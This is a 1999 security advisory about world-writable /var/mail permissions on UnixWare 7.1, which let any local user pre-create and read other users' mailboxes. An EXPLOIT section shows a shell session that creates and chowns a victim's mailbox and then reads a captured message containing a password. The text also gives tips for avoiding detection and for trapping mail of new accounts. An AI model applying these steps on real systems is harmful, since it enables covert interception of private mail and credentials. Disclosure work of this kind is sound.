Greetings, OVERVIEW Any user can read/modify others' mail. BACKGROUND Only UnixWare 7.1 was tested. DETAILS Imagine my suprise when I saw that /var/mail was mode 777. As such, any user may create a file called /var/mail/ with a mode readable by him and trap all incoming mail. Afraid of getting caught? chown the file to (see my advisory on this subject), leaving it still world-readable, and no one will ever know who did it. All of this assumes, of course, that the user has not recieved any mail yet. If you keep track of your /etc/passwd file, you can monitor for new entries and create the files as needed. This permissions problem obviously opens the door for all sorts of problems with symlinks and such. I would imagine that some mail delivery programs which aren't as smart as sendmail will follow symlinks in /var/mail. And as if all this wasn't bad enough, UnixWare's /usr/bin/mail is a BIG LIE: bash-2.02$ cat /usr/bin/mail #!/bin/sh cat > /dev/null exit 0 bash-2.02$ ;) EXPLOIT bash-2.02$ id uid=3D106(xnec) gid=3D1(other) bash-2.02$ pwd /var/mail bash-2.02$ touch btellier bash-2.02$ chown btellier btellier bash-2.02$ ls -la btellier -rw-r--r-- 1 btellier other 0 Dec 4 07:54 btellier Now wait for btellier to get some mail... bash-2.02$ ls -la btellier -rw-r--r-- 1 btellier other 410 Dec 4 07:55 btellier bash-2.02$ cat btellier =46rom root Sat Dec 4 07:55:29 1999 Return-Path: root Received: (from root@localhost) by localhost (8.8.7/UW7.1.0) id HAA04842 for btellier; Sat, 4 Dec 1999 07:55:29 -0600 (CST) Date: Sat, 4 Dec 1999 07:55:29 -0600 (CST) From: root@localhost Message-Id: <199912041355.HAA04842@localhost> Status: X-Status: X-SCO-PAD: XXXXXX X-SCO-UID: 1 Content-Length: 52 your ueber-secure password on 0wned.com is a@f9;se0 bash-2.02$ Brock Tellier UNIX Systems Administrator Chicago, IL, USA btellier@usa.net